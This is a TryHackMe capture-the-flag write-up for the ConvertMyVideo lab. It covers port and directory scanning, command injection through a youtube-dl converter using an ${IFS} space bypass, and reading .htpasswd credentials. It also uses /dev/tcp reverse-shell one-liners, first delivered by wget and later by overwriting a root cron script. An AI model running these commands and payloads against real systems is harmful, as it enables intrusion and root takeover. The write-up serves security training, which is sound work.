TryHackMe - ConvertMyVideo


Starting Nmap 7.60 ( ) at 2022-07-05 21:48 BST
Stats: 0:20:37 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 99.99% done; ETC: 22:09 (0:00:00 remaining)
Nmap scan report for (
Host is up (0.00047s latency).
Not shown: 65533 closed ports
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 65:1b:fc:74:10:39:df:dd:d0:2d:f0:53:1c:eb:6d:ec (RSA)
|   256 c4:28:04:a5:c3:b9:6a:95:5a:4d:7a:6e:46:e2:14:db (ECDSA)
|_  256 ba:07:bb:cd:42:4a:f2:93:d1:05:d0:b3:4c:b1:d9:b1 (EdDSA)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
MAC Address: 02:61:5C:CF:D0:3B (Unknown)
No exact OS matches for host (If you know what OS is running on it, see ).
TCP/IP fingerprint:

Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 1381.76 seconds

Port 80


└─# gobuster dir -u -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt                                                                                                            1 ⨯
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
[+] Url:           
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
2022/07/06 17:18:46 Starting gobuster in directory enumeration mode
/images               (Status: 301) [Size: 315] [-->]
/admin                (Status: 401) [Size: 460]                                   
/js                   (Status: 301) [Size: 311] [-->]    
/tmp                  (Status: 301) [Size: 312] [-->]

Apache version

  • Apache httpd 2.4.29 - CVE-2021-41773


  • Not going anywhere with this

The dl functionality

  • First I inspected on burp the request. Sent it to my repeater and played with it a little

  • Here are the interesting elements of the response

Unable to download webpage: HTTP Error 401: Unauthorized (caused by HTTPError()); please report this issue on https:\/\/\/bug . Make sure you are using the latest version; type  youtube-dl -U  to update. Be sure to call youtube-dl with the --verbose flag and include its complete output
  • According to this it is using a binary called youtube-dl and put the converted video to a downloads folder in /tmp

  • We can check youtube-dl documentation for more info

  • We can still get our user flag this way though, as we saw it listed with the previous command that worked cat${IFS}admin/flag.txt

  • Let's try to get a reverse shell all the one liners with reverse have dash sign in them. let's see if we can wget a homemade file with a oneliner shell in it and execute it afterwards.

  • We make a file called and put this in it

bash -i >& /dev/tcp/ATTACKING-MACHINE-IP/4444 0>&1
  • Replace the script with your IP

  • And we laucnh our python http server in the folder where our shell is

  • let's stabilize our shell python3 -c 'import pty; pty.spawn("/bin/bash")'

  • Let's try to overwrite


  • If we execute linpeas on the target we see that cron is running as root.

  • Let's get pspy in our target and execute it

bash /var/www/html/tmp/ 
/bin/sh -c cd /var/www/html/tmp && bash /var/www/html/tmp/ 
/usr/sbin/CRON -f
  • The clean is just an rm -rf downloads

  • Let's launch a listener rlwrap nc -lvp 5555

  • echo "bash -i >& /dev/tcp/ 0>&1" > /var/www/html/tmp/


  • What is the name of the secret folder? admin (we get this using gobuster, see above)

  • What is the user to access the secret folder? to know this we need to do this one we have our reverse shell cat admin/.htpasswd we will get the user and password inside this file.

  • I let you find the flags on your own :)

Last updated